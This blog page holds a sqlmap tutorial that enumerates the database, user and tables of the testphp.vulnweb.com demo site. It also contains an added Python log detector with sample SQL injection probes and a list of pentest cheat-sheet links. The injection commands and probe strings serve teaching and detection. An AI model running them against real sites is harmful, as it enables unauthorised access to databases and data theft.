Posts tagged sqlinjection

Using SQLMap for SQL Injection


We have been using a lot of tools for SQL injection while pentesting. Today we will see how to use SQLMap, an open source database fingerprinting tool that works without many false positives. We will test this tool on the http://testphp.vulnweb.com demo site.

1) Database Fingerprinting

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:52:47

[11:52:47] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:52:47] [INFO] resuming injection point 'GET' from session file
[11:52:47] [INFO] resuming injection parameter 'cat' from session file
[11:52:47] [INFO] resuming injection type 'numeric' from session file
[11:52:47] [INFO] resuming match ratio '0.701' from session file
[11:52:47] [INFO] resuming 0 number of parenthesis from session file
[11:52:47] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:52:47] [INFO] testing connection to the target url
[11:52:48] [INFO] testing for parenthesis on injectable parameter
[11:52:48] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5

[*] shutting down at: 11:52:48

2) Finding the database name and current user

./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --current-db --current-user

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:57:13

[11:57:13] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[11:57:13] [INFO] resuming injection point 'GET' from session file
[11:57:13] [INFO] resuming injection parameter 'cat' from session file
[11:57:13] [INFO] resuming injection type 'numeric' from session file
[11:57:13] [INFO] resuming match ratio '0.701' from session file
[11:57:13] [INFO] resuming 0 number of parenthesis from session file
[11:57:13] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:57:13] [INFO] testing connection to the target url
[11:57:17] [INFO] testing for parenthesis on injectable parameter
[11:57:17] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[11:57:17] [INFO] fetching current user
[11:57:17] [INFO] retrieved: acuart@localhost
current user:    'acuart@localhost'

[11:58:45] [INFO] fetching current database
[11:58:45] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
current database:    'acuart'

[11:58:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 11:58:45

3) Enumerate Databases

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:00:57

[12:00:58] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:00:58] [INFO] resuming injection point 'GET' from session file
[12:00:58] [INFO] resuming injection parameter 'cat' from session file
[12:00:58] [INFO] resuming injection type 'numeric' from session file
[12:00:58] [INFO] resuming match ratio '0.701' from session file
[12:00:58] [INFO] resuming 0 number of parenthesis from session file
[12:00:58] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:00:58] [INFO] testing connection to the target url
[12:00:58] [INFO] testing for parenthesis on injectable parameter
[12:00:58] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:00:58] [INFO] fetching database names
[12:00:58] [INFO] fetching number of databases
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:00:58] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
available databases [3]:
[*] acuart
[*] information_schema
[*] modrewriteShop

[12:00:58] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/testphp.vulnweb.com'

[*] shutting down at: 12:00:58

4) Enumerate Database Tables and Columns

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u http://testphp.vulnweb.com/listproducts.php?cat=1 --tables --columns

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 12:03:27

[12:03:27] [INFO] using '/pentest/database/sqlmap/output/testphp.vulnweb.com/session' as session file
[12:03:27] [INFO] resuming injection point 'GET' from session file
[12:03:27] [INFO] resuming injection parameter 'cat' from session file
[12:03:27] [INFO] resuming injection type 'numeric' from session file
[12:03:27] [INFO] resuming match ratio '0.701' from session file
[12:03:27] [INFO] resuming 0 number of parenthesis from session file
[12:03:27] [INFO] resuming back-end DBMS 'mysql 5' from session file
[12:03:27] [INFO] testing connection to the target url
[12:03:28] [INFO] testing for parenthesis on injectable parameter
[12:03:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 6.10 or 6.06 (Edgy Eft or Dapper Drake)
web application technology: Apache 2.0.55, PHP 5.1.2
back-end DBMS: MySQL 5
[12:03:28] [INFO] fetching tables
[12:03:28] [INFO] fetching database names
[12:03:28] [INFO] fetching number of databases
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': 3
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': information_schema
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': acuart
[12:03:28] [INFO] read from file '/pentest/database/sqlmap/output/testphp.vulnweb.com/session': modrewriteShop
[12:03:28] [INFO] fetching number of tables for database 'information_schema'
[12:03:28] [INFO] retrieved: 16
[12:03:37] [INFO] retrieved: CHARACTER_SETS
[12:04:52] [INFO] retrieved: COLLATI

It was very easy to enumerate these details with this tool. Next I will cover using sqlmap for advanced techniques.
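The enumeration above leaves a recognisable trail in the web server's access log. As an added example (not part of the original post), this Python detector parses combined-format log lines and flags two independent signals: sqlmap's default User-Agent (which carries the version string seen in the banner above) and non-numeric values in the numeric `cat` parameter that sqlmap reported as the injection point. The log lines, IP address, dates and byte counts are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Apache "combined" format: ip ident user [time] "method target proto" status bytes "referer" "ua"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$'
)

# GET parameters the application treats as integers; sqlmap reported the
# injection point above as the numeric parameter "cat" of listproducts.php.
NUMERIC_PARAMS = {"cat"}

def flag_request(line):
    """Return the reasons a log line looks like SQL injection probing ([] if clean)."""
    m = LOG_RE.match(line)
    if not m:
        return ["unparseable line"]
    reasons = []
    # sqlmap's default User-Agent carries its version string. The operator can
    # change it, so treat it as a supporting signal only, never the sole one.
    if "sqlmap" in m["ua"].lower():
        reasons.append("sqlmap User-Agent")
    # Type violations on the parameter itself survive any User-Agent change:
    # a numeric parameter should decode to digits and nothing else.
    query = parse_qs(urlsplit(m["target"]).query, keep_blank_values=True)
    for name in sorted(NUMERIC_PARAMS):
        for value in query.get(name, []):
            if not re.fullmatch(r"-?[0-9]+", value):
                reasons.append(f"non-numeric {name}={value!r}")
    return reasons

def scan(lines):
    """Index -> reasons for every suspicious line; clean lines are omitted."""
    return {i: r for i, r in enumerate(map(flag_request, lines)) if r}

# Constructed sample log (documentation IP range): a normal request, a sqlmap
# boolean-style probe, and the same probe with a browser User-Agent.
SAMPLE_LOG = [
    '203.0.113.5 - - [10/Feb/2011:11:52:47 +0000] "GET /listproducts.php?cat=1 HTTP/1.1" '
    '200 4521 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6"',
    '203.0.113.5 - - [10/Feb/2011:11:52:48 +0000] "GET /listproducts.php?cat=1%20AND%201234%3D1234 HTTP/1.1" '
    '200 4521 "-" "sqlmap/0.9-dev (http://sqlmap.sourceforge.net)"',
    '203.0.113.5 - - [10/Feb/2011:11:52:49 +0000] "GET /listproducts.php?cat=1%20AND%201234%3D1235 HTTP/1.1" '
    '200 2210 "-" "Mozilla/5.0 (X11; Linux x86_64) Firefox/3.6"',
]

if __name__ == "__main__":
    for i, reasons in scan(SAMPLE_LOG).items():
        print(f"line {i}: " + "; ".join(reasons))
```

The third sample line is the reason the parameter check matters: with the User-Agent changed, only the type violation on `cat` remains.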

Security Assessment and Pentest Tools Cheat Sheets


These are from my old bookmarks. Below are some useful cheat sheets; let me know if you find any others and I will update the post.

Nmap
http://sbdtools.googlecode.com/files/Nmap5%20cheatsheet%20eng%20v1.pdf

Nessus
http://www.secguru.com/link/nessus_nmap_scanning_cheatsheet

Backtrack 4
http://www.corelan.be:8800/index.php/2009/07/04/backtrack-4-cheat-sheet/

Misc tools
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf

Metasploit Meterpreter
http://en.wikibooks.org/wiki/Metasploit/MeterpreterClient
http://www.rmccurdy.com/scripts/Metasploit%20meterpreter%20cheat%20sheet%20reference.html

Oracle Security
http://www.red-database-security.com/wp/oracle_cheat.pdf

XSS
http://ha.ckers.org/xss.html
http://openmya.hacker.jp/hasegawa/security/utf7cs.html
http://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

SQL Injection
http://ha.ckers.org/sqlinjection/
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://ferruh.mavituna.com/oracle-sql-injection-cheat-sheet-oku/
http://www.irongeek.com/xss-sql-injection-fuzzing-barcode-generator.php

Microsoft SQL, Sybase, MySQL, Oracle, PostgreSQL, DB2, Ingres; Bypass SQL Injection Filters
http://michaeldaw.org/sql-injection-cheat-sheet
http://pentestmonkey.net/cheat-sheets/

Packetlife Cheatsheets
http://packetlife.net/cheatsheets/

Ed Skoudis’ Pentest Cheatsheets

Windows command line tools
http://www.sans.org/resources/sec560/windows_command_line_sheet_v1.pdf
Netcat Cheat Sheet
http://www.sans.org/resources/sec560/netcat_cheat_sheet_v1.pdf
Useful Attack Tools, Metasploit commands, HPing, FGDump
http://www.sans.org/resources/sec560/misc_tools_sheet_v1.pdf

Reverse Engineering Malware Cheat Sheet
http://zeltser.com/reverse-malware/reverse-malware-cheat-sheet.html

Security Architecture Cheat Sheet for Internet Applications
http://zeltser.com/security-management/security-architecture-cheat-sheet.html

CEH cheatsheets from Mindcert
http://www.mindcert.com/resources/MindCert_Nmap_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Enumeration_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Ethical_Hacking_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Footprinting_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Scanning_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_System_Hacking_MindMap.pdf
http://www.mindcert.com/resources/MindCert_CEH_Trojans_MindMap.pdf
http://www.mindcert.com/resources/CCNA_Cisco_IP_Routing.pdf
